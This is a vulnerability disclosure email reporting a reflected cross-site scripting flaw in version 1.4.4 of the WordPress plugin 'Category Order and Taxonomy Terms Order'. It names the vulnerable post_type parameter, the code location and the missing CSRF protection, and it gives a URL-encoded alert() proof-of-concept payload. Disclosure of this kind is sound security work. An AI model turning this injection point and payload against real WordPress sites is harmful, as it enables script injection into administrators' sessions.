Subject: Cross-Site Scripting (XSS) in Category Order and Taxonomy Terms Order 1.4.4
Date: Tue, 18 Aug 2015 22:49:04 +0200

Hello,

Plugin: Category Order and Taxonomy Terms Order 1.4.4 https://wordpress.org/plugins/taxonomy-terms-order/

1. Cross-Site Scripting (XSS) 

Authenticated administrators can inject html/js code (there is no CSRF protection).

Method: GET
Url: http://localhost/wp-admin/edit.php?page=to-interface-post&post_type=[xss]
Vulnerable parameters: post_type

Example PHP callstack:
TOPluginInterface   [/taxonomy-terms-order/include/interface.php:71]

Verification:
http://localhost/wp-admin/edit.php?page=to-interface-post&post_type=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29+%2F%3E

--
Regards,
Marcin Probola,